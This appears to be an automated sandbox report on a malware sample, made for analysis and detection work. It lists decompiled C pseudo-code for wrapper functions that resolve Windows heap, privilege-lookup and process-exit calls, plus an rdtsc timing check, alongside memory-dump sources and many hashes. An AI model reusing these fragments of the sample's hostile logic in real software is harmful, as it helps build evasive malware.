Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FFBF

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088C0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* __ebp;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E10(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407020( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CE0( &_v284, 0x104);
						E0041A350( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t39, _t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L9;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L9:
						_t33 = E00407050( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088cb
0x004088d3
0x004088d5
0x004088da
0x004088df
0x004088f2
0x004088f7
0x00408900
0x0040890c
0x0040891f
0x00408924
0x00408927
0x00408930
0x00408942
0x00408947
0x0040894c
0x00000000
0x00000000
0x0040894e
0x00408952
0x00000000
0x00000000
0x00408954
0x00000000
0x00408952
0x00408956
0x00408959
0x0040895f
0x00408961
0x0040896c
0x00408971
0x00408974
0x00408981
0x0040898c
0x0040898e
0x00408994
0x00408998
0x0040899b
0x0040899b
0x004089a2
0x004089a5
0x004089aa
0x004089b7
0x004088e6
0x004088e6
0x004088e6

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 00418469, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD

Strings

&5A, xrefs: 004184C2, 004184CC

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: a63a04ca83cad13283417fcfbec8dc0563dfe400c458e341ad7b44117533939e
Instruction ID: 7547b0446d9b9f58d16836e078a27c470265f3967dfab22e29488c3b98118c6f
Opcode Fuzzy Hash: a63a04ca83cad13283417fcfbec8dc0563dfe400c458e341ad7b44117533939e
Instruction Fuzzy Hash: F601A275200214BFDB14DF65DC85EE77B68EF94760F10459DF90D9B281D671E900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004184b7
0x004184c2
0x004184cd
0x004184d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD

Strings

&5A, xrefs: 004184C2, 004184CC

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D30( &_v67, 0, 0x3f);
				E0041A910( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 != 0) {
						L4:
						return _t14;
					}
					_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					asm("salc");
					goto L4;
				}
				return _t13;
			}

0x00407270
0x0040727f
0x00407283
0x0040728e
0x0040729e
0x004072ae
0x004072b3
0x004072ba
0x004072bd
0x004072ca
0x004072cc
0x004072ce
0x004072ed
0x00000000
0x004072ed
0x004072eb
0x004072ec
0x00000000
0x004072ec
0x004072f2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA

Uniqueness

Uniqueness Score: -1.00%

Function 004184D2, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004184D2(void* __eax, void* __edx, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t14;
				void* _t20;
				void* _t22;
				intOrPtr _t28;

				asm("sbb al, 0x68");
				_t22 = __esi - _t28;
				asm("invalid");
				asm("out dx, al");
				 *((intOrPtr*)(__edx + 0x4e)) = _t28;
				 *(__eax + 0x7b) =  *(__eax + 0x7b) >> 1;
				asm("sbb al, 0x55");
				_t11 = _a4;
				_push(_t22);
				_t6 = _t11 + 0xc74; // 0xc74
				E00418DD0(_t20, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t14;
			}

0x004184d2
0x004184d4
0x004184d6
0x004184d8
0x004184d9
0x004184dc
0x004184df
0x004184e3
0x004184e9
0x004184ef
0x004184f7
0x0041850d
0x00418511

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: abcf618fc2e9f7d9c8356e218add27dfb64900ac4c5fd1be8f151712a3a0b129
Instruction ID: 00f07a75dc85bd7753e366db1ba6db6b7c82d9b177573176ad89e689367ea782
Opcode Fuzzy Hash: abcf618fc2e9f7d9c8356e218add27dfb64900ac4c5fd1be8f151712a3a0b129
Instruction Fuzzy Hash: 45F0EDB22003046FC718EF64CC05EE33B68EF84354F01468AF9086B282C631EA14CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184ef
0x004184f7
0x0041850d
0x00418511

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041865a
0x00418670
0x00418674

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418520(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DD0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418523
0x0041853a
0x00418548

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418548

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C326F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: 81c1dee420739fc53d4aacc8d65a8fc46ef6ec9d339e6ef2c45ced1ff484f89e
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: 41F0C231334559EBDF48EA18DD55A6A73D5FB95300F64C039ED59C7241E631EE408390

Uniqueness

Uniqueness Score: -1.00%

Function 00C210D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00C20060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 00C201D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 00C21148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 00C2010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00C1F8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 00C21930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 00C1F938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
